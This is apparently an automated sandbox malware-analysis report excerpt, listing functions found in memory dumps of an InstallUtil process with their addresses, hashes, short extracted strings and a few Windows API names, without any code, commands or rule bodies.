KDBMZq, xrefs: 067F4AC4

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: KDBMZq
API String ID: 0-1462230996
Opcode ID: e8c23feb1500833a5b9c9c190c38febf867c3725b13b9eda72708412c6bf8cab
Instruction ID: 4f2602c4b969f05f0961df4464b48638dacfffb7743a59fa418eb775e7289d23
Opcode Fuzzy Hash: e8c23feb1500833a5b9c9c190c38febf867c3725b13b9eda72708412c6bf8cab
Instruction Fuzzy Hash: F4914675A10109CFD744DF99E584AABBBF2FBC8300F60C12AE6069B349CB74AD51CB91

Function 067F1FE0 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

~*Vk, xrefs: 067F2185

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ~*Vk
API String ID: 0-2852096391
Opcode ID: c6796ba290171c32042f6d152e795360d30761d6b1da867213c8b4374abb0b83
Instruction ID: 83dc21f78438ba7ffaac20fb171c92ef9cfa21e7019cbb67bb8615eb38589d67
Opcode Fuzzy Hash: c6796ba290171c32042f6d152e795360d30761d6b1da867213c8b4374abb0b83
Instruction Fuzzy Hash: 68A13B74A10208CFEB45DFA5D468AADB7F1FB48300F10C16AE816AB369DF75A941CF51

Function 06752398 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

B^, xrefs: 06752444

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: B^
API String ID: 0-4029585450
Opcode ID: 16f4fdc8b924670af72b0ae9bcb3d3a39308c8b58ff6a581ac4e5ea71b29c814
Instruction ID: d4fc43605fc31dd220819e679c0d85c02a646f81f715ce60c8c23cfc6bcd9c29
Opcode Fuzzy Hash: 16f4fdc8b924670af72b0ae9bcb3d3a39308c8b58ff6a581ac4e5ea71b29c814
Instruction Fuzzy Hash: FB51DA74A00218CFDBA4DF65D859BA9B7F1EB89301F5080E9D80ADB364DE359E81CF54

Function 067F98B8 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d463fb3eecd77598c83e41c4f7318bfcd4310cbafe1c30737eed25ef357615f8
Instruction ID: 24b65b00a4785591f546a1b2f1a4fbbdc1ae94c1bf6434154648903a6cb04665
Opcode Fuzzy Hash: d463fb3eecd77598c83e41c4f7318bfcd4310cbafe1c30737eed25ef357615f8
Instruction Fuzzy Hash: 65724D31D10A69CFDBA1CF28CD44BA9B7B2FF46714F4584D5EA086B211D7B2AA85CF40

Function 06758167 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26be6271d4c4357733d5c7d8509c736769b1763c01d3e6930dabbb1e9d1f64b8
Instruction ID: 21acf8fe7ccf2923608a865bbd0dbf82c473d1ab643030d44326cfb0c60c104a
Opcode Fuzzy Hash: 26be6271d4c4357733d5c7d8509c736769b1763c01d3e6930dabbb1e9d1f64b8
Instruction Fuzzy Hash: BAB12524D36EB4BBCFF5C575DC009FB3F99AA452B1F1781C8ED62A5112C5E086028BA7

Function 023D098D Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557a849e0334e7bf720914b0d0edd8cdffc4152825789de8bd5b9f008b7c364d
Instruction ID: c0e051a1f81bb53defb7f1496cb1c0eca46cd733169f5f0834897434fe02d263
Opcode Fuzzy Hash: 557a849e0334e7bf720914b0d0edd8cdffc4152825789de8bd5b9f008b7c364d
Instruction Fuzzy Hash: C3020774A00228DFCB64DF68D884B99B7B6BF48300F158599E90E9B365DB30EE81CF51

Function 067F89A0 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4dbecd650f75bd177ee9217309f6ae0b6e5ecb053221ca304f9c5fdbdcd9a85
Instruction ID: b355a66ecf97d17b63e5f71d88d15fd80074e52639ab4d309367f1fa341299d5
Opcode Fuzzy Hash: b4dbecd650f75bd177ee9217309f6ae0b6e5ecb053221ca304f9c5fdbdcd9a85
Instruction Fuzzy Hash: 76D17330B102158FC789EB74D565A7EB7F3AFC8200765816DD906EB399DE30AD02CB95

Function 067F176A Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb08dee299d2a32161f3400c2270611508624e2d7665fe78b2ead991dbe7d070
Instruction ID: bd298315be5e0185f7c0939379d9623e50dba00d7efcd9fdd847ea4fb4cf2830
Opcode Fuzzy Hash: fb08dee299d2a32161f3400c2270611508624e2d7665fe78b2ead991dbe7d070
Instruction Fuzzy Hash: 81D16A30A20245CFE795DB15D998FA9B3F2FB45314FA4C1ADC2099B399CB749985CF80

Function 0675D6F0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7ea06daaac703e46d3c564281d3f94d19a68d5c531a57024a44044dee710dd
Instruction ID: 5366f4ad06b4564218e837ac3d3661e2924aac5981920a44e92e1729fc960be3
Opcode Fuzzy Hash: 7a7ea06daaac703e46d3c564281d3f94d19a68d5c531a57024a44044dee710dd
Instruction Fuzzy Hash: 8AB14E34B002148FCB89EB65D969A6EB7F6EFCC200B518169DC06E7358DF74BD028B95

Function 067FFBA0 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c81a9a50076d8300e962c4fa3f209d77d61fb7f01230e35256403da0a193e0
Instruction ID: 58fe6e7a3b9b015f70f53518544dfe263c7b1172448fac3531a67649f004fea3
Opcode Fuzzy Hash: 21c81a9a50076d8300e962c4fa3f209d77d61fb7f01230e35256403da0a193e0
Instruction Fuzzy Hash: 37917430B101154FCBC5FBB9D9A59AEB3F2EF8C200B61816DD916A7358DE706D02CB95

Function 067FFB90 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aee2797681f50eaeff01a26383173e15aa352e0e6a085c7ca5f9fe0f00f5663
Instruction ID: 3d5042beb6ef8987d038cdb0b94560a6f6129327c8364ec153176983802a0d51
Opcode Fuzzy Hash: 5aee2797681f50eaeff01a26383173e15aa352e0e6a085c7ca5f9fe0f00f5663
Instruction Fuzzy Hash: B8914230B101158FCB85FBB9D9A5DAEB3F6EF8C204B21816DD915A7359DE70AD02CB90

Function 023DD768 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9736750e44f0ecd4aff9a7f727f6f5320eb8d8c9dcb256a41eb4a4b7c1e70369
Instruction ID: 067583d180f403d9031b914f9d40de7054567ec58702858c5e97ef2344182e7b
Opcode Fuzzy Hash: 9736750e44f0ecd4aff9a7f727f6f5320eb8d8c9dcb256a41eb4a4b7c1e70369
Instruction Fuzzy Hash: 49A1A977A04248CFEB24DF65F444BEDB7F7BB89304F1980A9C405ABA59C774A886CB40

Function 023DD758 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af0c85a84e6544d0c0f89b00f6f58680edd9e3c3fba0c47a473ee58a0a595c7
Instruction ID: 9890bf484e868f2593d247f0127dd6be220a1c2b2b640437ca979604229f812d
Opcode Fuzzy Hash: 5af0c85a84e6544d0c0f89b00f6f58680edd9e3c3fba0c47a473ee58a0a595c7
Instruction Fuzzy Hash: 0791BA77A04208CFEB24CF65F444BEDB7F3BB89304F1980A9D405ABA59C7749986CB44

Function 023DD96D Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889b21996b6c70e7c4ec565c9fdd0dce75e05a000c8349a391077a39a0941763
Instruction ID: 9da2400dae17a494bd087e2b0144dae81a8eed29bc5c653348097b528864fa6c
Opcode Fuzzy Hash: 889b21996b6c70e7c4ec565c9fdd0dce75e05a000c8349a391077a39a0941763
Instruction Fuzzy Hash: DF91A877A04209CFEB24CF65F444BEDB7F3BB85304F5980A9C405ABA59C7749986CB40

Function 0675EF08 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7249dc8589b865f143829744fdc1f0eab63a5e8d3d501bea4e2aead8cfb04317
Instruction ID: 77a62c2db89bba8dec2fdced72b4f1851a6e9c95ae5c38935d2ca146c3c93e7b
Opcode Fuzzy Hash: 7249dc8589b865f143829744fdc1f0eab63a5e8d3d501bea4e2aead8cfb04317
Instruction Fuzzy Hash: CD717F34B10204CFDB89EB65E465A6EB7F2EB88300F55C06DD9069B398DF78AC41CB85

Function 0497B820 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482af421d28ffc99dc7784b55ab1abbc3e5c82908f022739842bb71d1875b9e7
Instruction ID: 8873824da92f167f0916066e2a54a662c9c0e6b9a95e1390fc061b147b796e63
Opcode Fuzzy Hash: 482af421d28ffc99dc7784b55ab1abbc3e5c82908f022739842bb71d1875b9e7
Instruction Fuzzy Hash: 0F518B70B00104CFE728AF25D449B6E77A7EB88308F258439E9068B799DB74BC469B85

Function 0497B80F Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e6a6ecfec0f475a8290fb51c839fb95898eb2ea59155886f7394ddc40b1c0f
Instruction ID: 8d342741c71082f1c04e55792d3255e2bdefd5ec40c7ec1d44e0e71c0fb1987e
Opcode Fuzzy Hash: a3e6a6ecfec0f475a8290fb51c839fb95898eb2ea59155886f7394ddc40b1c0f
Instruction Fuzzy Hash: F5517E70B00104CFD728EF25D449BAE77A7EB88708F258439E9028B799DB74BC46DB95

Function 06756228 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: debef4adddb0b88cd839dbe39b125fbac113ebf837ae2c8b68cccb305b738607
Instruction ID: b6503e2012d67d69e35c0438c96a9c565b21899c759d7ca00248e7ce9bee4066
Opcode Fuzzy Hash: debef4adddb0b88cd839dbe39b125fbac113ebf837ae2c8b68cccb305b738607
Instruction Fuzzy Hash: 1B518C35B002008FD795EB69D469B6AB7F3EB89310F95C0A9D80B8B358DF74AC42CB51

Function 06756238 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e3d5ce5baa915935807aecaae2be483fbce9518c60e5ce80b74c6f2d21504c
Instruction ID: 6b01bd9d19b8aff2b0c7d3eab1fe4d081efcb2b8ec2d2397b6f2b919d4d5bb2f
Opcode Fuzzy Hash: 18e3d5ce5baa915935807aecaae2be483fbce9518c60e5ce80b74c6f2d21504c
Instruction Fuzzy Hash: 55516A34B002008FD795EB69D468B6AB7F3EB89310F95C0A9E90B87358DF75AD42CB51

Function 023D9000 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ab46c23fe70e46ee1043e70fcbf2abc2acaf7a21f8716af5535ec80206ac85
Instruction ID: 9bfd1028dacd56852f26ebec6d565f2ca3d78d853635961e3dcad2f28dd972ee
Opcode Fuzzy Hash: 30ab46c23fe70e46ee1043e70fcbf2abc2acaf7a21f8716af5535ec80206ac85
Instruction Fuzzy Hash: 39617DB0E00248DFCB04DFA9E445BADBBF2FF48304F818069D419AB665DB35598ACF10

Function 06756319 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee49ed18bde46acf250e3fede4d5d869149378476a8aa6cc8f292019f91d388f
Instruction ID: ab64a442bdcee55e07cdce0736944156559fcd78aa21649d030e13dac4bf78cd
Opcode Fuzzy Hash: ee49ed18bde46acf250e3fede4d5d869149378476a8aa6cc8f292019f91d388f
Instruction Fuzzy Hash: 71513A34B00200CFD795EB69D458B6AB7F2EB89310F95C0A9D80B8B368DF75AD45CB51

Function 023D9010 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2784be00d7630d7932aeaab9721553fbc4ed1d6ade0ff48e081df32a829a0ad1
Instruction ID: 9a5b48b56c4c976fa39d3de108626050c3b45a150000febf86faa239a8c89d8a
Opcode Fuzzy Hash: 2784be00d7630d7932aeaab9721553fbc4ed1d6ade0ff48e081df32a829a0ad1
Instruction Fuzzy Hash: 45517CB0E00248DFCB04DFAAE445BADBBF2FF49304F818069D419AB695DB35598ACF11

Function 0497A7BF Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581f9f07a1c34179a2674f3ba762491e4fb357d133ab4f98360909e3ecd5dc07
Instruction ID: 48698b57e8f6ff7df141c672be0ade69afde849913cbab284e25808c1395e5cb
Opcode Fuzzy Hash: 581f9f07a1c34179a2674f3ba762491e4fb357d133ab4f98360909e3ecd5dc07
Instruction Fuzzy Hash: 7751AE34B00104CFDB14CB69E488BADBBB3FB88310F168479D405A7796CB746D96DB44

Function 067FD4A8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f98542d455c80299e0fdb5c2de1812ee4692c9d601903f1242a21a84e53e3c
Instruction ID: d7be4caefa012c5c86fb11adf991dfe6f1af42d7f3539c6ed044deb5d29a2841
Opcode Fuzzy Hash: 67f98542d455c80299e0fdb5c2de1812ee4692c9d601903f1242a21a84e53e3c
Instruction Fuzzy Hash: 57516039710200CFD755EBA4D4A9B6AB7E6EB8C300F55C16DE90B8B399CF74A801CB91

Function 067F3810 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7031c41db26effcc6f38f84409c167fddc70e5ca6b46479936ddbcde46f32897
Instruction ID: 80f9df383bd96589a040da527bfe69209356927b74b1a83b741f2e72f31d6981
Opcode Fuzzy Hash: 7031c41db26effcc6f38f84409c167fddc70e5ca6b46479936ddbcde46f32897
Instruction Fuzzy Hash: 9B318D77929AC2ABF7E64B6DCC04DA2BB61FB6127071C8C59DB50D6701C32CA45187F1

Function 0569C4B8 Relevance: 7.7, APIs: 5, Instructions: 207
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0569C536
GetCurrentThread.KERNEL32 ref: 0569C573
GetCurrentProcess.KERNEL32 ref: 0569C5B0
GetCurrentThreadId.KERNEL32 ref: 0569C62E
DuplicateHandle.KERNELBASE(00000000,00000000,05678F9C,?,00000000,056903F4,00000000,?,?,?,?), ref: 0569C74F

Memory Dump Source

Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread$DuplicateHandle
String ID:
API String ID: 4285418203-0
Opcode ID: fefcec830068ab39726d05dc0143cfda43e61018b096fa4af8089be75aa50165
Instruction ID: bef0210d23d4022936e52089ab85017ebad157488ccc54d192b59963f47547eb
Opcode Fuzzy Hash: fefcec830068ab39726d05dc0143cfda43e61018b096fa4af8089be75aa50165
Instruction Fuzzy Hash: 159134B5D002499FEB14CFAAD588B9EBBF5FF48314F20801AE419A7360D774A845CF65

Function 04C3F708 Relevance: 7.7, Strings: 6, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 04C3F78C
4'q, xrefs: 04C3F7DA
4'q, xrefs: 04C3F852
(q, xrefs: 04C3F8D2
4'q, xrefs: 04C3F7BC
pq, xrefs: 04C3F85F

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$4'q$4'q$4'q$4'q$pq
API String ID: 0-2944075406
Opcode ID: 73a753a3f8999a042f0b77156a7d0b2f07cea10a43b35c1c6254a1fd0c1eae60
Instruction ID: c35cbbb24f6c8cb4413a9156ea7f3c3a842545d4450bfeb270ca1de4a342f851
Opcode Fuzzy Hash: 73a753a3f8999a042f0b77156a7d0b2f07cea10a43b35c1c6254a1fd0c1eae60
Instruction Fuzzy Hash: 8051AE30E003059FDB59EB79E8517AFB7E3AFC9300F14882DD44A9B755DB34A90687A2

Function 0569C4A8 Relevance: 6.1, APIs: 4, Instructions: 140
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0569C536
GetCurrentThread.KERNEL32 ref: 0569C573
GetCurrentProcess.KERNEL32 ref: 0569C5B0
GetCurrentThreadId.KERNEL32 ref: 0569C62E

Memory Dump Source

Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1b4ae9165b0645fb93cdb67d1ca6f45873b3061c23aa0cc219ec018f2290bc29
Instruction ID: d98f581fd714a7b6c9c8c47e368b0bcebc917f6eafb6b1a384d395981e2eedc6
Opcode Fuzzy Hash: 1b4ae9165b0645fb93cdb67d1ca6f45873b3061c23aa0cc219ec018f2290bc29
Instruction Fuzzy Hash: A75138B0D002099FEB18DFA9D588B9EBBF5BF48314F10C41AE419AB360D774A845CF65

Function 04978F18 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 04978FC7
Hq, xrefs: 04978FF3
(q, xrefs: 04979200
(q, xrefs: 049790FB

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$(q$(q$Hq
API String ID: 0-564500637
Opcode ID: 1c5e90aeb7c4a9b5a015a888257b94deea864fe9eecfdf254b60313dbe952472
Instruction ID: 0e9ba440397229688412d447da835268a2441e4ad1dc96bbc78f0b90963369fa
Opcode Fuzzy Hash: 1c5e90aeb7c4a9b5a015a888257b94deea864fe9eecfdf254b60313dbe952472
Instruction Fuzzy Hash: 909124317042104FE716AB78A890B6E7BA7EFC6310B1885BED509CF392DE319C06C7A5

Function 0497073A Relevance: 5.2, Strings: 4, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_q, xrefs: 04970DF3
(_q, xrefs: 04970DFD
(_q, xrefs: 04970E79
(_q, xrefs: 04970E43

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (_q$(_q$(_q$(_q
API String ID: 0-1088526261
Opcode ID: 4fe02367d689ba20f7b50c39b8ab7e30a551d2edb8d2c028de43b0aef6a81325
Instruction ID: 6bb40e7efb8a448bc67bd35250a2b22bc2d588695a30dc47bac1311b2640e9d6
Opcode Fuzzy Hash: 4fe02367d689ba20f7b50c39b8ab7e30a551d2edb8d2c028de43b0aef6a81325
Instruction Fuzzy Hash: 4761B275F042058FCB05DF78D4955AEBFB2EF86304B148969D4469B362EB31ED42CB81

Function 049792C0 Relevance: 4.3, Strings: 3, Instructions: 526
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 04979688
(q, xrefs: 049793C5
(q, xrefs: 04979860

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$(q$(q
API String ID: 0-2103260149
Opcode ID: 051e2998e719a6384ac9c88652c83d80bfe9fc52b32a0397f4c8ba41cf28ef20
Instruction ID: 9bc1eb05a8a130204409ab3004fe51eaa4904634eef0b515b5fdbe428c52ea5b
Opcode Fuzzy Hash: 051e2998e719a6384ac9c88652c83d80bfe9fc52b32a0397f4c8ba41cf28ef20
Instruction Fuzzy Hash: 8812BE74B006158FD714DF68D494AAEBBF2FFC9300B148A6ED44ADB791DA34E902CB94

Function 04C3E440 Relevance: 4.2, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 04C3E944
Hq, xrefs: 04C3E915
Hq, xrefs: 04C3E994

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq
API String ID: 0-2505839570
Opcode ID: 41a59332a5c08593c8b3e82065b35cfe36691826eb31d9c8a7fff6a20fa64caa
Instruction ID: 6b2c16d45d041ea3f459c1b5e6cfc0032b8fb4ef8c730f00c973c6d6df4c8b0a
Opcode Fuzzy Hash: 41a59332a5c08593c8b3e82065b35cfe36691826eb31d9c8a7fff6a20fa64caa
Instruction Fuzzy Hash: 97125974A002188FDB25DFA5C484AAEB7F7BF88305F14892DE50A9B351DB31ED46CB90

Function 04971AB0 Relevance: 4.1, Strings: 3, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 04971C41
(q, xrefs: 04971C15
(q, xrefs: 04971BE9

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$(q$Hq
API String ID: 0-2914423630
Opcode ID: dba428cb8ca710e666e47ca91f62ea766dc32348d5bfae496a9eac9810b64d85
Instruction ID: f83a75e73e63def9e323b783d380739cc9c3578d58f673dee4c1509b707f25e4
Opcode Fuzzy Hash: dba428cb8ca710e666e47ca91f62ea766dc32348d5bfae496a9eac9810b64d85
Instruction Fuzzy Hash: E5E15134A00209DFDB14EFA4E49599EBBB2FFC9304F148569E805AB365DB30ED46CB91

Function 06753360 Relevance: 3.9, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 067534F3
$q, xrefs: 067533A7
$q, xrefs: 067533B5

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: 09a9a2459fd256916d23c0fd1c64bf84c056514a74395ed1c4f057bcf9e0a1df
Instruction ID: d0c06cf2ee920c279280738e7c90abdadc898f49d11277247853657807a374d0
Opcode Fuzzy Hash: 09a9a2459fd256916d23c0fd1c64bf84c056514a74395ed1c4f057bcf9e0a1df
Instruction Fuzzy Hash: 7D515230B001158FE755E7A6E85877BF3E7EBC4250F15C0AAD90AC7368EEB498018795

Function 067FD1DD Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

$q, xrefs: 067FD43E
$q, xrefs: 067FD251
$q, xrefs: 067FD430

Memory Dump Source

